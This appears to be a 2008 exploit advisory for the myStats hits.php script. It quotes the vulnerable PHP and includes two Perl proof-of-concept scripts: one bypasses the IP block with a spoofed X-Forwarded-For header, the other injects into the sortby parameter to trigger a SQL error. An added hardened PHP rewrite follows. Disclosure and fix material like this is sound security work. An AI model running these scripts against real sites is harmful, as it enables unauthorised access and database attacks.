myStats (hits.php) Multiple Remote Vulnerabilities Exploit

2008.10.22
Credit: JosS
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

---------------------
Break System Block IP
---------------------

<<hits.php>>

7:  if (@getenv("HTTP_X_FORWARDED_FOR")) {
        $u_ip = @getenv("HTTP_X_FORWARDED_FOR");
    } else {
        $u_ip = @getenv("REMOTE_ADDR");
    }
    if ($u_ip == BLOCK_IP) {
        return 1;
13:     exit;
    }

<<config.php>>

11: define("BLOCK_IP", "127.0.0.1");

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php";

my $ua=LWP::UserAgent->new();
$ua->default_header('X-Forwarded-For' => "127.1.1.1");
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;

if ($response->is_success)
{
    open(FILE,">>results.txt");
    print FILE "$contenido\n";
    close(FILE);
    print "\n[+] Exploit Succesful!\n\n";
}
else
{
    print "\n[-] Exploit Failed!\n\n";
}

<<proof of concept>>

$ua->default_header('X-Forwarded-For' => "127.1.1.1");   --> BREAK BLOCK_IP

-------------
SQL Injection
-------------

<<hits.php>>

63: if (isset($_GET['sortby'])) {$sortby = $_GET['sortby'];} else { $sortby = 'timestamp' ;}

    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;

69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());

<<exploit.pl>>

use HTTP::Request;
use LWP::UserAgent;

my $web="http://localhost/hits.php?sortby=1'";

my $ua=LWP::UserAgent->new();
my $respuesta=HTTP::Request->new(GET=>$web);
$ua->timeout(30);
my $response=$ua->request($respuesta);
$contenido=$response->content;

if ($response->is_success)
{
    if($contenido =~ /You have an error in your SQL syntax;/)
    {
        print "\n[+] Exploit Succesful!\n";
        print "\n[+] Content:\n";
        print "$contenido\n\n";
    }
}
else
{
    print "\n[-] Exploit Failed!\n\n";
}
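
A hardened form of the two hits.php fragments above, as an added example that is not part of the advisory or of myStats. The table name, the DISPLAY_LOG_NO value, the columns other than timestamp, and the trusted-proxy parameter are assumptions made so the sketch runs on its own.

```php
<?php
// Added example, not myStats code. Constant names mirror the page; the
// table name and DISPLAY_LOG_NO value are constructed so this runs alone.
define('BLOCK_IP', '127.0.0.1');
define('LOG_TBL', 'mystats_log');
define('DISPLAY_LOG_NO', 50);
// Only 'timestamp' appears on the page; the other columns are hypothetical.
const SORTABLE_COLUMNS = ['timestamp', 'ip', 'referer'];

// Identify the visitor by the TCP peer address. X-Forwarded-For is sent by
// the client, so honour it only when the peer is a known reverse proxy.
function client_ip(array $server, array $trustedProxies = []): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($peer, $trustedProxies, true)) {
        // The right-most entry is the one appended by our own proxy.
        $hops = array_map('trim', explode(',', $xff));
        $last = end($hops);
        if (filter_var($last, FILTER_VALIDATE_IP) !== false) {
            return $last;
        }
    }
    return $peer;
}

function is_blocked(string $ip): bool
{
    return $ip === BLOCK_IP;
}

// Column names cannot be bound as query parameters, so map the request
// value onto an allowlist and fall back to the default otherwise.
function order_by_column(array $get): string
{
    $requested = $get['sortby'] ?? 'timestamp';
    return in_array($requested, SORTABLE_COLUMNS, true) ? $requested : 'timestamp';
}

function build_log_query(array $get): string
{
    return 'SELECT * FROM `' . LOG_TBL . '` ORDER BY `' . order_by_column($get)
         . '` DESC LIMIT 0, ' . (int) DISPLAY_LOG_NO;
}

// Constructed requests carrying the header and sortby value from the advisory.
$ip = client_ip(['REMOTE_ADDR' => '127.0.0.1', 'HTTP_X_FORWARDED_FOR' => '127.1.1.1']);
var_dump(is_blocked($ip));
echo build_log_query(['sortby' => "1'"]), "\n";
```

With no trusted proxy configured the forwarded header is ignored and the block check sees the real peer address; the unlisted sortby value falls back to timestamp, so no request data reaches the SQL text.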

References:

http://www.securityfocus.com/bid/31772
http://www.milw0rm.com/exploits/6759
http://secunia.com/advisories/32289


Copyright 2019, cxsecurity.com

 
